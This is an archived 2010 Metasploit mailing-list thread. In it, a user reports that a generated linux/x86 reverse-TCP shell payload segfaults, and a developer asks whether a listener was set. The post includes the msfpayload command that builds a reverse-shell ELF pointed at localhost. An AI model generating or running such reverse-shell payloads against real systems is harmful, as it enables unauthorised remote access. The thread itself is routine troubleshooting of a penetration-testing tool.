Metasploit mailing list archives

Re: Linux payloads broken


From: Ramon de Carvalho Valle <ramon () metasploit com>
Date: Fri, 07 May 2010 09:53:01 -0300

Did you set a listener on the selected port?

-Ramon


On 05/07/2010 05:21 AM, Konrads Smelkovs wrote:
konrads@konrads-laptop:~/msf2$ ./msfpayload linux/x86/shell_reverse_tcp
LHOST=127.0.0.1 LPORT=80 X >out.elf
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell_reverse_tcp
 Length: 71
Options: LHOST=127.0.0.1,LPORT=80
konrads@konrads-laptop:~/msf2$ file out.elf
out.elf: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),
statically linked, *corrupted section header size*
konrads@konrads-laptop:~/msf2$ chmod +x out.elf
konrads@konrads-laptop:~/msf2$ ./out.elf
*Segmentation fault*
konrads@konrads-laptop:~/msf2$ uname -a
Linux konrads-laptop 2.6.31-20-generic #58-Ubuntu SMP Fri Mar 12 05:23:09
UTC 2010 i686 GNU/Linux


Same for metsvc_reverse_tcp payload
--
Konrads Smelkovs
Applied IT sorcery.




_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: